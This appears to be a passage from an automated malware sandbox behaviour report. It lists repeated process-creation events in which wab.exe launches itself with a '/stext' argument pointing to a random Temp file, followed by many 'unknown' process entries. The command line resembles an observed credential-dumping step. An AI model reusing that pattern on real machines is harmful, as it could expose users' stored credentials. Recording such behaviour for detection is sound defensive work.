Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: unknown unknown	Jump to behavior
